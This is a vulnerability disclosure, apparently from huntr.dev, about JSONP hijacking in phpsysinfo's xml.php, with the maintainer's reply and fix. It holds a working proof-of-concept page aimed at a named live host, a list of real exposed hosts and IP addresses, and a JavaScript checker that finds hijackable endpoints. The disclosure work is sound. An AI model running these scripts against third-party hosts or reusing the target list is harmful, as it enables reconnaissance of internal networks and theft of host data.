XML.php JSONP hijacking in phpsysinfo/phpsysinfo
Reported on
Apr 27th 2023
Description
The xml.php file has a JSONP hijacking vulnerability. When xml.php is requested with ?json and a callback name, it returns the system information as JSON wrapped in a call to that JavaScript function, which makes the response a valid script. A <script> element may load a script from any origin, so a page crafted by the attacker can include that URL, define the callback function itself, and receive the data when the victim's browser executes the response; the same-origin policy does not restrict script execution. Because the request is made by the victim's browser, it reaches any phpsysinfo instance the victim can reach, including ones that are only accessible from an internal network.
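To make the mechanism concrete, here is an added example in JavaScript (Node.js) that is not phpsysinfo code: a model of a JSONP-capable xml.php handler beside a hardened version, and a model of what happens when a page on another origin loads the endpoint as a script. The sample system data, the handler functions, the config flag jsonpEnabled and the callback-name rule are assumptions made for the example; the hardened variant follows the direction the maintainer takes in the thread below (JSONP off unless explicitly enabled).

```javascript
// Added example, not phpsysinfo code. Models xml.php?json&callback=NAME and the
// cross-origin <script> load that hijacks it. The data, handler shapes, config
// flag and callback rule below are all assumptions made for this demo.

// Constructed sample of the kind of data xml.php returns as JSON.
const SYSINFO = {
  Vitals: { Hostname: "fileserver01.corp.example", IPAddr: "10.0.12.7" },
  Network: [{ Name: "eth0", Address: "10.0.12.7" }],
};

// Vulnerable handler: any request carrying a callback parameter gets the JSON
// wrapped in a call to that name, which turns the data into executable script.
function vulnerableXmlPhp(query) {
  const json = JSON.stringify(SYSINFO);
  if ("callback" in query) {
    return { status: 200, contentType: "application/javascript",
             body: `${query.callback}(${json});` };
  }
  return { status: 200, contentType: "application/json", body: json };
}

// Hardened handler: JSONP is off by default (assumed config flag jsonpEnabled).
// When an administrator does enable it, the callback must be a plain identifier,
// the standard rule for any JSONP endpoint, so the response can only ever call a
// function and never carries attacker-chosen script.
const CALLBACK_RE = /^[A-Za-z_$][\w$]{0,63}$/;

function hardenedXmlPhp(query, config = { jsonpEnabled: false }) {
  const json = JSON.stringify(SYSINFO);
  if (!("callback" in query)) {
    return { status: 200, contentType: "application/json", body: json };
  }
  if (!config.jsonpEnabled) {
    return { status: 403, contentType: "application/json",
             body: JSON.stringify({ error: "JSONP is disabled" }) };
  }
  if (!CALLBACK_RE.test(String(query.callback))) {
    return { status: 400, contentType: "application/json",
             body: JSON.stringify({ error: "invalid callback name" }) };
  }
  return { status: 200, contentType: "application/javascript",
           body: `/**/${query.callback}(${json});` };
}

// Models the attacker's page containing
//   <script src="https://victim-host/xml.php?json&callback=NAME"></script>
// The response body runs in the attacker page's global scope, so a function the
// attacker defined under NAME receives the data; the same-origin policy never
// applies to script execution. A plain JSON body is a SyntaxError as a script
// and calls nothing.
function attackerPageLoads(handler, callbackName, config) {
  const stolen = [];
  const response = handler({ json: "", callback: callbackName }, config);
  try {
    // Bind the attacker's function under the callback name and run the body as
    // a script, which is what the browser does with a <script> response.
    new Function(callbackName, response.body)((data) => { stolen.push(data); });
  } catch (e) {
    // Browser would log the SyntaxError and move on; no callback is invoked.
  }
  return stolen;
}

console.log("vulnerable handler leaked:", JSON.stringify(attackerPageLoads(vulnerableXmlPhp, "dezsbrxdio")));
console.log("hardened handler leaked:  ", JSON.stringify(attackerPageLoads(hardenedXmlPhp, "dezsbrxdio")));
```

Note that turning jsonpEnabled back on restores the hijack even with a strict callback rule: the callback check only stops script injection through the parameter, it does not stop a foreign page from naming a function it defines itself. Disabling JSONP is the mitigation; the callback rule is defence in depth for deployments that need it.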
Proof of Concept
We created an HTML file as a proof of concept to showcase the vulnerability. It loads https://phpbb.trabitechnik.com/xml.php as a script with a callback name of our choosing and displays the returned JSON data in a pop-up window.
In a real-world attack the callback would not display the data. It would forward it to a server the attacker controls, for example with an XMLHttpRequest or fetch call, or by encoding it into the URL of an image request; the victim only has to open the attacker's page.
Here is the HTML code for the proof of concept file:
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title></title>
  <!-- jQuery is loaded by the proof of concept but is not used by it -->
  <script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
  <script>
    // The callback the JSONP response invokes; it receives the parsed data object.
    function dezsbrxdio(data){
      alert(JSON.stringify(data));
    }
  </script>
  <!-- Cross-origin script load: the browser executes whatever xml.php returns.
       Several candidate parameter names are passed so that whichever one the
       server honours selects the callback defined above. -->
  <script src="https://phpbb.trabitechnik.com/xml.php?json&callback=dezsbrxdio&jsonp=dezsbrxdio&cb=dezsbrxdio&json=dezsbrxdio"></script>
</body>
</html>
Here are some online assets using phpsysinfo that I have found:
https://server.wxp-3.nl/xml.php
https://sysinfo.pouserinet.fi/xml.php
https://zvoyc1uy16u7hu9e.myfritz.net/xml.php
http://204.11.55.179/xml.php
http://204.11.55.87/xml.php
http://88.67.242.79/xml.php
http://217.131.251.40/xml.php
To test whether a given installation is vulnerable, replace "phpbb.trabitechnik.com" in the HTML file with the host of the xml.php you want to test, open the modified file in a browser, and check whether a pop-up window appears containing the JSON data. If it does, the endpoint honoured the cross-origin script load and the installation is vulnerable to JSONP hijacking. If the endpoint is only reachable from an internal network, run the test from a browser on that network; that is exactly the position a victim's browser would be in.
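The manual pop-up test above can be automated. The following is an added example in JavaScript (Node.js 18 or later, for the built-in fetch), not part of the original report: it requests xml.php with a random callback name, mirroring the parameter set the proof of concept uses, and decides from the response body whether the server wrapped its JSON in a function call. The parsing and classification are pure functions so they can be checked against constructed response bodies without network access; the host in the usage line is a placeholder.

```javascript
// Added example, not part of the original report: automated check for a
// callback-wrapped (JSONP) response from xml.php. Host names are placeholders.

// Matches  [/**/] identifier ( ...json... ) [;]  with surrounding whitespace.
// Dots are allowed in the identifier because some servers accept "obj.fn".
const JSONP_RE = /^\s*(?:\/\*\*\/\s*)?([A-Za-z_$][\w$.]*)\s*\(([\s\S]*)\)\s*;?\s*$/;

// Returns { callback, data } if the body is a single function call around valid
// JSON, otherwise null. Plain JSON, HTML error pages, and bodies with an
// anti-hijack prefix such as "throw 1;" all return null, which is correct:
// none of them hands data to a foreign page's callback.
function parseJsonpResponse(body) {
  const m = JSONP_RE.exec(body);
  if (!m) return null;
  try {
    return { callback: m[1], data: JSON.parse(m[2]) };
  } catch (e) {
    return null;
  }
}

// A wrapped response is hijackable whether or not the server echoed our probe
// name: if it uses a fixed callback name instead, the attacker's page simply
// defines a function with that fixed name. echoedProbe only records which case
// was observed.
function classifyResponse(body, probeName) {
  const parsed = parseJsonpResponse(body);
  if (!parsed) {
    return { vulnerable: false, reason: "response is not callback-wrapped JSON" };
  }
  return {
    vulnerable: true,
    callback: parsed.callback,
    echoedProbe: parsed.callback === probeName,
    topLevelKeys: Object.keys(parsed.data),
  };
}

// Live check against one xml.php URL. A random probe name makes a reflected
// callback distinguishable from a hard-coded one.
async function checkXmlPhp(xmlPhpUrl, fetchImpl = globalThis.fetch) {
  const probe = "cb_" + Math.random().toString(36).slice(2, 10);
  const sep = xmlPhpUrl.includes("?") ? "&" : "?";
  const url = `${xmlPhpUrl}${sep}json&callback=${probe}&jsonp=${probe}&cb=${probe}`;
  const res = await fetchImpl(url, { redirect: "follow" });
  const body = await res.text();
  return { url, status: res.status, ...classifyResponse(body, probe) };
}

// Usage: node check.js https://phpsysinfo.example.internal/xml.php
if (typeof process !== "undefined" && process.argv[2]) {
  checkXmlPhp(process.argv[2])
    .then((r) => console.log(JSON.stringify(r, null, 2)))
    .catch((e) => { console.error(e.message); process.exitCode = 1; });
}
```

Run it from a machine that sits where a victim's browser would sit, since a result of "not callback-wrapped" from the outside says nothing about an installation that only answers on the internal network.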
Impact
xml.php exposes exactly the kind of data JSONP hijacking is dangerous for: host information that is normally only visible from inside the network. When such data is exposed through JSONP and can be hijacked, the consequences can be severe.
An attacker who lures an internal user to a crafted page can retrieve server names, IP addresses, network details and other data that helps map out the internal network structure. That information can then be used to identify additional targets within the network and to launch more targeted attacks.
If the phpsysinfo host is part of a larger system or network, the attacker can use what was obtained through JSONP hijacking to work towards other systems or sensitive data within that network.
Overall, the consequences of JSONP hijacking are significant and can lead to a range of security issues and data breaches. Administrators should confirm that their installations are not exposed in this way and take appropriate measures to mitigate the risk, for example by keeping JSONP disabled unless it is actually needed.
I sincerely hope that we can all work together with joy and enthusiasm to help the author fix this vulnerability, especially with the valuable assistance of Huntr.dev’s staff who created the issue on GitHub.
Phpsysinfo was created precisely to provide information about the computer, so there is no disadvantage to doing what it was designed to do. The protection against hijacking can be the use of the https protocol.
Hello, it seems that you are not familiar with the JSONP hijacking vulnerability. As you mentioned, Phpsysinfo was designed to provide information about computers, making it a sensitive page that is typically located on an internal network. With this proof of concept (POC), we can obtain data from the Phpsysinfo page within the internal network.
It's important to note that using HTTPS doesn't solve this issue, as it's a problem with the code itself. It's crucial to address this vulnerability and implement proper security measures to protect against potential attacks.
If you believe that the data on the Phpsysinfo page should be made public, then it would likely violate information security policies and regulations.
Data privacy and security are critical concerns in today's digital age, and it's important to adhere to industry-standard best practices to safeguard sensitive information. Making such data publicly accessible without proper authorization could result in data breaches, loss of confidential information, and even legal consequences. Therefore, it's essential to evaluate the sensitivity of data and implement appropriate security measures to protect it from unauthorized access or exposure.
In a few days I will try to disable jsonp support in default settings. It will need to be explicitly enabled in settings.
Done: https://github.com/phpsysinfo/phpsysinfo/commit/4f2cee505e4f2e9b369a321063ff2c5e0c34ba45
Okay!!!! That's good! I hope you can apply for a CVE number for this vulnerability.